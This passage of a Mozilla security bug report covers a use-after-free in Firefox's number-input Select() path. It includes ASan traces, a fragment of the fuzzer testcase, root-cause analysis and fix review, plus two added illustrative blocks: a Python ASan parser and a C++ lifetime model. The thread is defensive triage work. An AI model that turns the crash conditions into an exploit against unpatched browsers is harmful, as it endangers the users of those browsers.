    #31 0x7f51f4de14cf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #32 0x7f51f4de3c7e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #33 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #34 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #35 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #36 0x7f51f507548f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #37 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12 in GetBoolFlag
==29513==ABORTING
Attached file ASAN output
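As an added triage example (not part of this bug or of Mozilla's tooling), the following Python parses an ASan report in the format above into the fields a triager reads first: bug type, access size and offset into the freed object, and the first non-inlined frame of each of the three stacks. The embedded report is a constructed, abbreviated copy of the one above, and the title heuristic (skip frames attributed to header files, which are inlined helpers) is an assumption of this example, not an ASan or Bugzilla rule.

```python
import re
from dataclasses import dataclass, field

HEADER_RE = re.compile(r"==\d+==ERROR: AddressSanitizer: ([\w-]+) on address 0x[0-9a-f]+")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at 0x[0-9a-f]+ thread T\d+")
REGION_RE = re.compile(r"is located (\d+) bytes inside of (\d+)-byte region")
# "#N 0xADDR in <function, may contain spaces> <location>": the location is the
# last whitespace-free token (path:line:col, or "(lib+offset)" for libc frames).
FRAME_RE = re.compile(r"^\s*#(\d+)\s+0x[0-9a-f]+\s+in\s+(.+?)\s+(\S+)$")

# Constructed sample: an abbreviated copy of the report format from this bug.
SAMPLE = """\
==29513==ERROR: AddressSanitizer: heap-use-after-free on address 0x6150005339b0 at pc 0x7f51ef4b0479 bp 0x7ffdbbad88e0 sp 0x7ffdbbad88d8
READ of size 4 at 0x6150005339b0 thread T0
    #0 0x7f51ef4b0478 in GetBoolFlag /src/dom/base/nsINode.h:1630:12
    #1 0x7f51ef4b0478 in GetPrimaryFrame /src/dist/include/nsIContent.h:916
    #2 0x7f51ef4b0478 in nsGenericHTMLElement::GetFormControlFrame(bool) /src/dom/html/nsGenericHTMLElement.cpp:1005
    #3 0x7f51ef3566ba in SelectAll /src/dom/html/HTMLInputElement.cpp:3766:43
    #4 0x7f5205fca82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

0x6150005339b0 is located 48 bytes inside of 496-byte region [0x615000533980,0x615000533b70)
freed by thread T0 here:
    #0 0x4b21db in __interceptor_free /llvm/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f51ea449f34 in SnowWhiteKiller::~SnowWhiteKiller() /src/xpcom/base/nsCycleCollector.cpp:2665:9
    #2 0x7f51ea449b26 in nsCycleCollector::FreeSnowWhite(bool) /src/xpcom/base/nsCycleCollector.cpp:2840:3

previously allocated by thread T0 here:
    #0 0x4b24fb in malloc /llvm/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7f51ef3215a9 in operator new /src/dist/include/mozilla/mozalloc.h:194:12
    #2 0x7f51ef3215a9 in NS_NewHTMLInputElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /src/dom/html/HTMLInputElement.cpp:129

SUMMARY: AddressSanitizer: heap-use-after-free /src/dom/base/nsINode.h:1630:12 in GetBoolFlag
"""

@dataclass
class Frame:
    index: int
    function: str
    location: str

    def short_name(self) -> str:
        """'ns::Foo(bool)' -> 'ns::Foo'."""
        return self.function.split("(", 1)[0]

    def in_header(self) -> bool:
        """Frames attributed to a .h file are usually inlined helpers (heuristic)."""
        return re.search(r"\.h:\d+", self.location) is not None

@dataclass
class AsanReport:
    bug_type: str = ""
    access: str = ""
    size: int = 0
    offset: int = -1
    region_size: int = -1
    stacks: dict = field(default_factory=dict)  # "crash"/"freed"/"allocated" -> [Frame]

def parse_asan(text: str) -> AsanReport:
    """Split the report into header fields and the crash/freed/allocated stacks."""
    report, section = AsanReport(), None
    for line in text.splitlines():
        if m := HEADER_RE.search(line):
            report.bug_type = m[1]
        elif m := ACCESS_RE.match(line):
            report.access, report.size, section = m[1], int(m[2]), "crash"
        elif m := REGION_RE.search(line):
            report.offset, report.region_size = int(m[1]), int(m[2])
        elif line.startswith("freed by thread"):
            section = "freed"
        elif line.startswith("previously allocated by thread"):
            section = "allocated"
        elif line.startswith("SUMMARY:"):
            section = None
        elif section and (m := FRAME_RE.match(line)):
            report.stacks.setdefault(section, []).append(Frame(int(m[1]), m[2], m[3]))
    return report

def first_frame(frames: list, skip=()) -> "Frame | None":
    """First frame that is neither an allocator shim nor an inlined header helper."""
    for f in frames:
        if f.short_name() not in skip and not f.in_header():
            return f
    return frames[0] if frames else None

def summarize(report: AsanReport) -> dict:
    """The fields a triager wants at a glance; the title rule mirrors this bug's summary."""
    crash = first_frame(report.stacks.get("crash", []))
    freed = first_frame(report.stacks.get("freed", []), skip=("__interceptor_free",))
    alloc = first_frame(report.stacks.get("allocated", []), skip=("malloc", "moz_xmalloc", "operator new"))
    return {
        "title": f"{report.bug_type} in {crash.short_name()}" if crash else report.bug_type,
        "access": f"{report.access} of {report.size} bytes at offset {report.offset} of a {report.region_size}-byte object",
        "freed_in": freed.short_name() if freed else None,
        # A free under nsCycleCollector means the object died in a GC/CC sweep
        # while something else still held a raw pointer to it.
        "freed_during_cc": any("nsCycleCollector" in f.function for f in report.stacks.get("freed", [])),
        "allocated_by": alloc.short_name() if alloc else None,
    }
```

Run against the full report in this bug, the same rules yield the bug's own title and identify the dangling object as an HTMLInputElement freed by the cycle collector.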
Is 57 (nightly) affected? If not we need to figure out if this was fixed along the way (maybe we'll get a free patch) or whether a broken back-port introduced this into the ESR branch.
Group: core-security → dom-core-security
Component: Layout: Form Controls → DOM: Core & HTML
Whiteboard: [fixwindow-wanted]
mrbkap, can you take a quick look here to see if there's an easy fix?
Flags: needinfo?(mrbkap)
Assignee: nobody → mrbkap
Flags: needinfo?(mrbkap)
Priority: -- → P1
Quick update: the testcase as written is broken:

  o1=window.open('data:text/html,<div><div><div>','popup35','height=134');
  o1.onload=fun0;

as of the changes in bug 1324406 data: URIs are cross-origin and are therefore opaque so the testcase errors out early on.

(Where is one supposed to find the fuzzPriv extension? I Googled around and ended up building it from source from [1], but is there a better source for it?)

[1] https://github.com/MozillaSecurity/domfuzz
(In reply to Blake Kaplan (:mrbkap) from comment #4)
> (Where is one supposed to find the fuzzPriv extension? I Googled around and
> ended up building it from source from [1], but is there a better source for
> it?)
> 
> [1] https://github.com/MozillaSecurity/domfuzz

That is the correct source for fuzzPriv.

See also bug 1399400 where GC/CC are available behind --enable-fuzzing and pref fuzzing.enabled=true.
(In reply to Jesse Schwartzentruber (:truber) from comment #5)
> See also bug 1399400 where GC/CC are available behind --enable-fuzzing and
> pref fuzzing.enabled=true.

Sorry, this should be bug 1322400.
After fixing the data: URI to be another (same origin) page, installing fuzzPriv, allowing popups, and testing on a window manager that supports resizing, I'm unable to reproduce on central on OSX or Linux. I could try to bisect to see if I can figure out when this regressed/got fixed, if needed.
Flags: needinfo?(dveditz)
(In reply to Blake Kaplan (:mrbkap) from comment #7)
> After fixing the data: URI to be another (same origin) page,

... or you could have just changed the pref security.data_uri.unique_opaque_origin back

> I'm unable to reproduce on central on OSX or Linux. I could try to
> bisect to see if I can figure out when this regressed/got fixed, if needed.

I'd have expected Nils to file against Nightly if it were reproducible there. We need to answer two questions:

- Was this introduced on the ESR 52 branch by a backport?
** if 52.0 is clean then bisect ESR 52 for the regressing patch

- Was this fixed on trunk?
** if 52.0.0 shows the problem bisect mozilla-central for the fix

Tyson: you've been fuzzing ESR 52 lately. Are these bisections something you could do?
Flags: needinfo?(dveditz) → needinfo?(twsmith)
(In reply to Daniel Veditz [:dveditz] from comment #8)
> (In reply to Blake Kaplan (:mrbkap) from comment #7)
> > After fixing the data: URI to be another (same origin) page,
> 
> ... or you could have just changed the pref
> security.data_uri.unique_opaque_origin back
> 
> > I'm unable to reproduce on central on OSX or Linux. I could try to
> > bisect to see if I can figure out when this regressed/got fixed, if needed.
> 
> I'd have expected Nils to file against Nightly if it were reproducable
> there. We need to answer two questions
> 
> - Was this introduced on the ESR 52 branch by a backport?
> ** if 52.0 is clean then bisect ESR 52 for the regressing patch
> 
> - Was this fixed on trunk?
> ** if 52.0.0 shows the problem bisect mozilla-central for the fix
> 
> Tyson: you've been fuzzing ESR 52 lately. Are these bisections something you
> could do?

I'm in the process of bisecting this.  I'll update once it's complete.
Flags: needinfo?(twsmith) → needinfo?(jkratzer)
For some reason, all local ESR52 builds from 52.0.1 (4af7cd795eee) to tip trigger this issue.  However, I cannot get this issue to trigger using the earliest available taskcluster build (283e5bdcd11e).

I'll see if I can't track this issue down in m-c.
Flags: needinfo?(jkratzer)
Bisection on mozilla-central determined that the first good revision is:
changeset:   361853:d44994c67873
parent:      361803:9255719d469c
user:        Ehsan Akhgari <ehsan@mozilla.com>
date:        Wed May 31 17:45:09 2017 -0400
summary:     Bug 1369140 - Part 1: Revert to only flushing styles when checking whether an element is focusable; r=bzbarsky
Maybe Ehsan (author of patch in bug 1369140) or bz (reviewer of said patch) can chime in here on this sec-high UAF bug.
Flags: needinfo?(ehsan)
Flags: needinfo?(bzbarsky)
So the fix for bug 1369140 _fixed_ this issue, right?

That mostly sounds like it covered up the problem, honestly.  We're now not doing layout when we used to, so maybe not firing the resize event or whatnot.

Looking at the crashing stack, we're doing the o15.select() call, do GetPrimaryFrame(), then crash because "this" is dead.  Presumably this bit:

  if (aFlushFrames && IsInComposedDoc()) {
    // Cause a flush of the frames, so we get up-to-date frame information
    GetComposedDoc()->FlushPendingNotifications(Flush_Frames);
  }

at the top of nsGenericHTMLElement::GetFormControlFrame killed "this".  Which is pretty bizarre, because "this" is not only the "this" value for the binding call, but is stored in a global variable in JS, no?

Anyway, the report here predates bug 1371259 being fixed, afaict (it came in a few hours after that patch landed on esr52, so may be from a build that does not include that change).  And that change should _really_ make sure we don't end up with "this" dying in a situation like this.

So the first step is to check whether this still happens on current esr52 builds (which do _not_ have the fix for bug 1369140).
Flags: needinfo?(bzbarsky)
I don't have much to add to comment 13 for now...
Flags: needinfo?(ehsan)
Confusingly, I can't get this to crash on esr52 (on revision [1]). Still investigating...

[1] https://hg.mozilla.org/releases/mozilla-esr52/rev/592df6088926
Blake told me this doesn't affect 57.
Tyson: can you check out the bisection bz talked about in comment 13?
Flags: needinfo?(twsmith)
Summary: heap-use-after-free in nsGenericHTMLElement::GetFormControlFrame → [ESR-52] heap-use-after-free in nsGenericHTMLElement::GetFormControlFrame
(In reply to Boris Zbarsky [:bz] (no decent commit message means r-) from comment #13)
> So the first step is to check whether this still happens on current esr52
> builds (which do _not_ have the fix for bug 1369140).

I verified this is still reproducible on the latest ESR52
BuildID=20171109201650
SourceStamp=f9df5238dca13e40b8128faba317df25e2f69249
Flags: needinfo?(twsmith)
Hi Tyson, can you give me some detailed STR to reproduce this? I've still never reproduced this on any branch or any revision. I'm wondering if I'm maybe doing something wrong.
Flags: needinfo?(twsmith)
(In reply to Blake Kaplan (:mrbkap) from comment #19)
> Hi Tyson, can you give me some detailed STR to reproduce this? I've still
> never reproduced this on any branch or any revision. I'm wondering if I'm
> maybe doing something wrong.

Hi Blake, I assume the issue is that this testcase requires the fuzzPriv[1] extension. The easiest way to test IMO is to use FFPuppet[2] to launch the builds and collect the logs (it also makes using extensions, custom prefs.js files and alternate profiles very simple). Lastly, you can use fuzzfetch[3] to collect the required build from TC.

[1] https://github.com/MozillaSecurity/domfuzz/tree/master/dom/extension
[2] https://github.com/MozillaSecurity/ffpuppet
[3] https://github.com/MozillaSecurity/fuzzfetch
Flags: needinfo?(twsmith)
I still haven't reproduced this so instead I've been reading lots of code. I think I know what's happening.

From the crash stack:
    #6 0x7f51ef3566ba in mozilla::dom::HTMLInputElement::Select() /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3724
    #7 0x7f51ef3563b7 in mozilla::dom::HTMLInputElement::Select() /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3688:14

This is tricky. The "recursive" call here is moving from the <input type=number> to its native anonymous subtree's input element (that's why it doesn't matter about the node in the binding or the global JS variable).

I'm not entirely sure, but I think that we end up in that select call in the middle of the input element's move to the outer document. That could lead to code here [1] which would call into the focus manager (and failing to set focus because of [2][3]) but calling nsFocusManager::CheckIfFocusable, which is the function that Ehsan fixed to do less work, making us destroy the native anonymous content (and running GC), leaving us with a destroyed HTMLInput element.

This is all super speculative though. I'll attach a patch for ESR that wallpapers over this. Tyson, would you be able to see if it fixes this for you?

[1] https://searchfox.org/mozilla-central/rev/be78e6ea9b10b1f5b2b3b013f01d86e1062abb2b/dom/html/HTMLInputElement.cpp#3499
[2] https://searchfox.org/mozilla-central/rev/be78e6ea9b10b1f5b2b3b013f01d86e1062abb2b/dom/base/nsFocusManager.cpp#1872
[3] https://searchfox.org/mozilla-central/source/dom/base/nsGlobalWindowInner.cpp#4401
Attached patch Hold onto this element (obsolete) — Splinter Review
Comment on attachment 8933172 [details] [diff] [review]
Hold onto this element

(I'm leaving the commit message intentionally vague for the time being.)

Boris, does anything I said in comment 21 make sense?
Flags: needinfo?(twsmith)
Attachment #8933172 - Flags: feedback?(bzbarsky)
(In reply to Blake Kaplan (:mrbkap) from comment #23)
> Comment on attachment 8933172 [details] [diff] [review]
> Hold onto this element

Verified on ESR52 with the patch and no UAF.
Flags: needinfo?(twsmith)
Attached patch Patch v2 (obsolete) — Splinter Review
I looked at the other uses of mTextField and this was the only other one that seemed like it might be similar enough to warrant a strong ref.

I don't know if there is a way to trigger this bug on central -- we do
still call into the focus manager (as well as other code) and I haven't
tracked down all of the possible side effects. Ehsan's patch might just
be enough to avoid the possible destruction of the anonymous content
tree for the input element under select/focus, but I can't prove it.
That being said, an additional ref count shouldn't be visible in these
call paths, so I'd like to land this patch on central as well as esr52.

MozReview-Commit-ID: 4EqS1huHnVN
Attachment #8934762 - Flags: review?(bzbarsky)
Attachment #8933172 - Attachment is obsolete: true
Attachment #8933172 - Flags: feedback?(bzbarsky)
Comment on attachment 8934762 [details] [diff] [review]
Patch v2

Argh, I'm sorry for the horrible lag here.  I'm still catching up on the Thanksgiving weekend mail deluge.  :(

Comment 21 does make sense.  In particular, the "this" of the _outer_ Select() call is strongly held, but the "this" of the _inner_ one is not.  When the inner Select() then runs script, it kills its own "this", etc.

r=me on this patch.  This code desperately needs some MOZ_CAN_RUN_SCRIPT annotation as a followup...
Attachment #8934762 - Flags: review?(bzbarsky) → review+
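The point from comment 26 (the outer Select()'s "this" is strongly held, the inner one's is not) reduced to a small C++ model. This is an added illustration, not Gecko code: TextField, NumberControl and DetachAnonymousContent are made-up stand-ins for the anonymous text field, the number control that owns it, and the script side effect that tears the anonymous content down.

```cpp
#include <functional>
#include <memory>

// Stand-in for the native anonymous <input> inside an <input type=number>.
struct TextField {
    bool selected = false;
    // Models the inner Select(): it may run script (focus handling) and then
    // touches *this again. If that script freed *this, this is the UAF.
    void SelectInner(const std::function<void()>& runScript) {
        runScript();
        selected = true;
    }
};

// Stand-in for the number control that owns mTextField.
struct NumberControl {
    std::shared_ptr<TextField> mTextField = std::make_shared<TextField>();
    // Script side effect from the testcase: the anonymous content is torn
    // down, so the owner drops its only reference to the text field.
    void DetachAnonymousContent() { mTextField.reset(); }
};

// Buggy shape: the inner call goes through the member with no extra reference.
// Rather than dereference freed memory (undefined behaviour), this reports
// whether the access after the script call would have hit a dead object.
bool InnerThisDiesWithoutGrip() {
    NumberControl owner;
    std::weak_ptr<TextField> watch = owner.mTextField;
    TextField* inner = owner.mTextField.get();   // no refcount taken
    owner.DetachAnonymousContent();              // "script" runs here
    (void)inner;                                 // would be used next: UAF
    return watch.expired();                      // true: *inner is gone
}

// Fixed shape: a stack-held strong reference (the kungFuDeathGrip) keeps the
// inner "this" alive across the script call, and the call is made through it
// so the grip is actually used rather than merely constructed from the member.
bool InnerThisSurvivesWithGrip() {
    NumberControl owner;
    std::shared_ptr<TextField> kungFuDeathGrip = owner.mTextField;
    kungFuDeathGrip->SelectInner([&owner] { owner.DetachAnonymousContent(); });
    // owner.mTextField is now null, but the object itself is still alive.
    return owner.mTextField == nullptr && kungFuDeathGrip->selected;  // true
}
```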
Comment on attachment 8934762 [details] [diff] [review]
Patch v2

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

I think it would be quite hard, even on ESR. The testcase requires many moving parts (including multiple windows so the focus manager doesn't keep the anonymous element alive).

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

No.

Which older supported branches are affected by this flaw?

ESR52.

If not all supported branches, which bug introduced the flaw?

The bug fixed here has been in the code for quite a long time. It has been hidden on trunk by bug 1369140.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

Easy to backport.

How likely is this patch to cause regressions; how much testing does it need?

This patch is extremely safe.
Attachment #8934762 - Flags: sec-approval?
(In reply to Blake Kaplan (:mrbkap) from comment #27)

> Which older supported branches are affected by this flaw?
> 
> ESR52.

Why do the flags say that 57 is unaffected? Are they just wrong? I see it commented above that you said 57 is unaffected. Does that mean this is an ESR only issue?
Flags: needinfo?(mrbkap)
(In reply to Al Billings [:abillings] from comment #28)
> Why do the flags say that 57 is unaffected? Are they just wrong? I see it
> commented above that you said 57 is unaffected. Does that mean this is an
> ESR only issue?

I didn't think this affected 57 at all when I commented before. As I said in comment 25, I'm not as sure now if there is a way to trigger this on 57/trunk. At the moment, there is no known testcase that can cause this on branches with the patch for bug 1369140 on them. I'd like to land this on trunk more out of paranoia and defense-in-depth against future changes than a pressing need to address a known problem.
Flags: needinfo?(mrbkap)
Comment on attachment 8934762 [details] [diff] [review]
Patch v2

Ok. Sec-approval+ for trunk.
I assume we want to take this on ESR52 since it is clearly affected there.
Attachment #8934762 - Flags: sec-approval? → sec-approval+
Backed out from inbound for bustage.
https://hg.mozilla.org/integration/mozilla-inbound/rev/03aebc551f9da0dfbe383c39d2fcb2f2975eeecc

https://treeherder.mozilla.org/logviewer.html#?job_id=151102412&repo=mozilla-inbound
layout/forms/nsNumberControlFrame.cpp:595:5: error: Unused "kungFuDeathGrip" 'nsCOMPtr<Element>' (aka 'nsCOMPtr<mozilla::dom::Element>') objects constructed from members are prohibited
Tracking this for 59/58, to help keep an eye on this.
MozReview-Commit-ID: IqzGDM4ezeW
Attachment #8936679 - Flags: review+
Attachment #8934762 - Attachment is obsolete: true
I think the new patch is similar enough to the old patch to not need new approvals or reviews.
Flags: needinfo?(mrbkap)
Keywords: checkin-needed
https://hg.mozilla.org/mozilla-central/rev/02d457ace9bb
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla59
Attached patch Merged to esr52 — Splinter Review
Trivial merge to esr52.
Comment on attachment 8937827 [details] [diff] [review]
Merged to esr52

[Approval Request Comment]
Fix Landed on Version: 59
Risk to taking this patch (and alternatives if risky): Very low risk.
String or UUID changes made by this patch: n/a
Attachment #8937827 - Flags: approval-mozilla-esr52?
Attachment #8936679 - Flags: approval-mozilla-beta?
Comment on attachment 8937827 [details] [diff] [review]
Merged to esr52

sec-high uaf, let's take this on esr52 and beta58.
Attachment #8937827 - Flags: approval-mozilla-esr52? → approval-mozilla-esr52+
Attachment #8936679 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Group: dom-core-security → core-security-release
Whiteboard: [fixwindow-wanted] → [fixwindow-wanted][adv-main58+][adv-esr52.6+]
Alias: CVE-2018-5098
Summary: [ESR-52] heap-use-after-free in nsGenericHTMLElement::GetFormControlFrame → heap-use-after-free in nsGenericHTMLElement::GetFormControlFrame
Flags: qe-verify+
Whiteboard: [fixwindow-wanted][adv-main58+][adv-esr52.6+] → [fixwindow-wanted][adv-main58+][adv-esr52.6+][post-critsmash-triage]
Flags: sec-bounty?
I couldn't reproduce the crash using the testcase and a linux64-asan build. Also, the FuzzPriv extension cannot be added to latest builds because it is not a legacy add-on (the preferences to support non-legacy add-ons can't be used on beta and esr).

Tyson, could you please verify that this issue is properly fixed? Thank you!
Flags: needinfo?(twsmith)
Flags: sec-bounty? → sec-bounty+
Verified release using a fuzzing build which is compatible with the new fuzzpriv[1] web extension.
Verified ESR using standard ASan build. FFPuppet[2] sets prefs to allow fuzzpriv (legacy) to work.

[1] https://github.com/MozillaSecurity/fuzzpriv
[2] https://github.com/MozillaSecurity/ffpuppet
Status: RESOLVED → VERIFIED
Flags: needinfo?(twsmith)
Thanks a lot Tyson!
I'm removing the qe-verify+ flag.
Group: core-security-release